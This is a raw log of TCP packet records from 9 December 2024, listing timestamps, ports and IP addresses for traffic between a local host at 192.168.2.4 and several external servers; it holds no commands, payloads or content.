Dec 9, 2024 08:08:54.934323072 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.934360027 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.934935093 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.936168909 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.936182022 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.936192989 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.936209917 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.936280966 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.937441111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.937458992 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.937505960 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.938698053 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.938723087 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.938798904 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.939955950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.939969063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.941214085 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.941823006 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.941834927 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.941844940 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.941845894 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.942199945 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.943145990 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.943161011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.944320917 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.944333076 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.945585966 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.945602894 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.946543932 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.946856976 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.946870089 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.946957111 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.949305058 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:54.955132008 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:54.955346107 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:54.955363989 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:54.956562996 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:54.956574917 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:54.957638025 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:54.957660913 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:54.958889008 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:54.963598967 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:54.963840961 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:54.967477083 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:54.967624903 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:54.991252899 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:55.079946041 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.080187082 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.081944942 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.084260941 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.089432001 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.147111893 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.147366047 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.147470951 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.151369095 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.151597977 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.152472019 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.160073996 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.160187960 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.160213947 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.160357952 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.168010950 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.168250084 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.173002958 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.176523924 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.177122116 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.177756071 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.178122997 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.178123951 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:55.180852890 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:55.180860996 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.181109905 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.185117006 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.185295105 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.193559885 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.193809986 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.201034069 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.201299906 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.202075005 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.202124119 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.202358007 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.202399969 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.210628033 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.210861921 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.210971117 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.219186068 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.225511074 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.231336117 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:55.272036076 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.272217989 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.272248030 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.272324085 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.275333881 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.276371956 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.276448011 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.276583910 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.276637077 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.284954071 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.285195112 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.336935043 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.337002993 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.339528084 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.339684963 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.341978073 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.347212076 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.347419024 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.352885008 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.355596066 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.355722904 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.357299089 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.363698959 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.363998890 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.368731976 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.368963003 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.369374990 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.373728037 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.373966932 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.375416994 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:55.378788948 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.378971100 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.380525112 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.382280111 CET	49917	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:55.383780003 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.383840084 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.383996010 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.384042978 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.388768911 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.389091969 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.389214993 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.389713049 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.393866062 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.394083023 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.398848057 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.399122953 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.400655031 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.403851032 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.404114962 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.408875942 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.409111023 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.413561106 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.413803101 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.416337013 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.418142080 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.418287039 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.422751904 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.423000097 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.427279949 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.427668095 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.429373980 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.431813955 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:55.431871891 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.432101011 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.433238983 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.436482906 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.436677933 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.436723948 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.436759949 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.463478088 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:55.463535070 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:55.464396954 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.464441061 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.464608908 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.464648008 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.466676950 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.466726065 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.466912985 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.466959953 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.471337080 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.471390963 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.471522093 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.471565008 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.475913048 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.475960016 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.476118088 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.476162910 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.480530977 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.480577946 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.480739117 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.480915070 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.501593113 CET	5200	49917	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:55.501666069 CET	49917	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:55.501821041 CET	49917	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:55.529073000 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.529120922 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.529252052 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.529289007 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.531579018 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.531624079 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.531770945 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.531831980 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.533045053 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.533091068 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.533243895 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.533277988 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.537501097 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.537559986 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.537725925 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.537771940 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.541980028 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.542047024 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.542212963 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.542254925 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.546489954 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.546534061 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.546730995 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.546770096 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.549731016 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.549772024 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.550007105 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.550048113 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.552983046 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.553025007 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.553190947 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.553230047 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.556287050 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.556332111 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.556467056 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.556504965 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.559161901 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.559202909 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.559415102 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.559457064 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.561956882 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.562000036 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.562146902 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.562189102 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.564661026 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.564728022 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.564893961 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.564937115 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.567404985 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.567450047 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.567625046 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.567665100 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.570135117 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.570175886 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.570424080 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.570456028 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.572838068 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.572880983 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.573080063 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.573121071 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.575565100 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.575622082 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.575798035 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.575835943 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.578304052 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.578347921 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.578516960 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.578556061 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.580986977 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.581034899 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.581199884 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.581243992 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.583693981 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.583739042 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.584105968 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.584148884 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.586436033 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.586488008 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.586669922 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.586709023 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.589169025 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.589226961 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.589396000 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.589454889 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.591871977 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.591916084 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.592087984 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.592130899 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.594118118 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.594166040 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.594363928 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.594410896 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.596307039 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.596384048 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.596565008 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.596606016 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.598543882 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.598582983 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.598753929 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.598798990 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.600717068 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.600783110 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.600930929 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.601031065 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.602902889 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.602947950 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.603094101 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.603136063 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.621028900 CET	5200	49917	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:55.654483080 CET	80	49911	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:55.654537916 CET	49911	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:55.656903982 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.656951904 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.657120943 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.657160997 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.657939911 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.657999992 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.658199072 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.658250093 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.660092115 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.660132885 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.660330057 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.660367012 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.662182093 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.662228107 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.662492037 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.662537098 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.664323092 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.664372921 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.664609909 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.664653063 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.666419029 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.666469097 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.666646004 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.666691065 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.668560982 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.668608904 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.668808937 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.668853045 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.670658112 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.670697927 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.670938015 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.670975924 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.672790051 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.672836065 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.673048973 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.673083067 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.674932003 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.674971104 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.733016968 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.733028889 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.733068943 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.733952999 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.733998060 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.734549046 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.734592915 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.734816074 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.734857082 CET	49880	80	192.168.2.4	185.215.113.206
